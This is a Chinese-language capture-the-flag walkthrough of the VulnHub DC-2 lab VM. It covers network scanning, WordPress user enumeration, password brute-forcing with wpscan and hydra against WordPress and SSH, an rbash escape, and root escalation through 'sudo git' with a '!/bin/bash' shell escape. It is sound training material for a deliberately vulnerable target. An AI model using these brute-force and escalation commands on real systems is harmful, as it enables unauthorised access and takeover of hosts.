靶机搭建

1
靶机下载地址 https://download.vulnhub.com/dc/DC-2.zip

下载之后使用VMware导入DC -1.ova文件 启动就行 将网段设置为NAT

这样算成功

信息收集

扫描机器网卡上的所有ip

1
arp-scan -l

1
靶机: 192.168.154.130 攻击机: 192.168.154.128

ping一下目标主机看看能不能ping通

1
ping 192.168.154.130

利用nmap扫描一下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -Pn -sV -p- 192.168.154.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-02 22:39 EST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 22:39 (0:00:06 remaining)
Nmap scan report for 192.168.154.130
Host is up (0.00097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:81:2B:B2 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

利用whatweb工具看一下目标站点的指纹

发现了一个链接

1
http://dc-2/

去浏览器访问一下

flag

打开看看

看到了目标站点是wordpress4.7.10 既然知道了网站框架为wordpress那不用一下wpscan说不过去吧

1
wpscan --ignore-main-redirect --url http://192.168.154.130 --enumerate u --force

这个命令是扫描网站并且枚举网站用户名

在第一个flag中说可以利用cewl工具

cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个字典,这个字典可以传给其他工具进行密码暴力破解。

1
cewl http://dc-2/ -w passwd.txt

将利用wpscan枚举出来的用户名复制下来放在新建的user.txt

然后利用wpscan工具进行枚举密码

1
wpscan --ignore-main-redirect --url http://dc-2/ -U user.txt -P passwd.txt -t 30

admin账户并没有枚举出来,既然有账号密码来登陆一下目标站点后台 打过wordpress框架的都知道

它的后台地址是wp-login.php或wp-admin

flag2

flag说找另一个切入点

之前扫描端口发现还开启着ssh

现在来爆破ssh 利用hydra工具

1
2
3
hydra -t 32 -l admin -P passwd.txt -s 7744 192.168.154.130 ssh
hydra -t 32 -l jerry -P passwd.txt -s 7744 192.168.154.130 ssh
hydra -t 32 -l tom -P passwd.txt -s 7744 192.168.154.130 ssh

既然知道了ssh登录账户现在来进行登录

1
ssh tom@192.168.154.130 -p 7744

看到了flag3文件 打开它

1
cat flag3.txt

看到了rbash

什么是rbash?

受限shell是LinuxShell限制一些bash shell中的功能,并且是从名字上很清楚。 该限制很好地实现了命令以及脚本在受限shell中运行。 它为Linux中的bash shell提供了一个额外的安全层。

rbash是可以绕过的 现在来进行绕过

rbash绕过

git提权

git提权

进入自定义bash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a 
$ cd ../
$ ls
jerry tom
$ cd jerry
$ ls
flag4.txt
$ cat flag4.txt
a: 5: cat: not found
$ vi flag4.txt
$ /bin/bash
tom@DC-2:/home/jerry$ export PATH=$PATH:/bin/
tom@DC-2:/home/jerry$ su jerry
Password:
jerry@DC-2:~$ sudo git help config

1
!/bin/bash

这样就提权到root权限

flag3

flag4

flag5